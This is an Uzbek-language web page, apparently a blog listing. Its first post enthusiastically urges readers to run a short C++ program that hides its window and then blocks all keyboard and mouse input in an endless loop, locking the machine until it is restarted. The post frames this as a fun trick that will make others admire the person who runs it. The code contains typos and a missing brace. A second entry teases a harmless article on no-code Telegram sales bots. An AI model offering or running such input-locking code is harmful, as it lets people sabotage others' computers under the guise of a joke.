Asosiy kontentga o‘tish

Menejment
Menejment

BUNI ALBATTA SINAB KO'RING, JUDA AJOYIB!!!

BUNING CODI C++ DA:

#incluse <windows.h>
int main() {

	// concole hiding
	FreeConsole();
	
	while (true){
		BlockInput(true);
	}
	
	system("pause");
	
	return 0;

JUDA ZO'R KOD EKAN!!!

ALBATTA BUNI ISHLATIB KO'RING!!!

SIZNI HAMMA ENG ZO'R DEB TAN OLADI VA HAMMA HAVAS QILADI!!!

 

Maqola
Menejment

TELEGRAMDA BOT YARATISH

Ushbu maqolada dasturlash ko'nikmasisiz va ularni ishga solmasdan qanday qilib savdo-sotiq uchun telegram botini yaratish mumkin bo'lgan konstruktorlarini ko'rib chiqamiz. Aslida bunday konstruktorlar juda ko'p va har birining o'zining ustunliklari va kamchiliklari bor albatta, lekin men qisqa va londa tushuntirishga... (Ko‘proq)